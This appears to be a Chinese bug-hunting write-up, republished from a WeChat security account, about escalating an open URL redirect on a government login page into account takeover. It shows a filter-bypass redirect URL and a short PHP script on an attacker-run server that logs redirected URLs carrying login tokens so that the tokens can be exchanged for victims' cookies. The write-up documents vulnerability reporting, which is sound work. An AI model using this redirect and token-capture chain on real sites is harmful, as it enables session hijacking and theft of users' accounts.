前言
这本是一次简单的url跳转,就在我准备提交的时候,灵机一动.....
正文
近期因为一些任务,需要cnvd,所以在gov里面进行大量的搜集测试。
这里我正常检测登录页面,发现有一个疑似可以url跳转的
但是常规构造会被拦截掉
这种并非防火墙,应该是对url中关键内容进行校验,这种方式可以尝试使用?进行拼接绕过。
因此我构造了这样一个
https://www.xxxx.gov.cn/login?service=http://www.xxxx.cn/?xxx.gov.cn/shiro
以此来绕过他的前端检测
因为是刚提交,打码严重哈哈
但是这样的危害一般cnvd只能定级中危,那么我想要达到高危,就需要进一步升级。
因此我尝试登录,通过bp一步步分析其中的登录方式
这里通过几步进行验证,首先是登录验证用户名和密码,成果之后,跳转的url中会添加上令牌。我们构造数据包,发送令牌可以获取到用户的cookie
就是跳转之后的url中会附加上令牌。
构造利用
利用远程服务器,在上面搭建一个php文件,用于远程利用,当用户登陆后跳转访问到我的服务器网址后,访问这个php,会自动接受保存访问者的url到我服务器中的cookie.txt中,我可以通过令牌,发送数据包获取用户cookie。
<?php
// 设置文件路径
$file = 'cookie.txt';
// 获取请求的URL
$url = "http://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]";
// 保存URL到文件
file_put_contents($file, $url . PHP_EOL, FILE_APPEND);
print('Hello');
exit();
?>
这里也可以构造跳转到原本的主页,一样不会引起怀疑。
完成账户接管
原文始发于微信公众号(SecNL安全团队):记一次GOV的URL跳转引发的账户接管
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论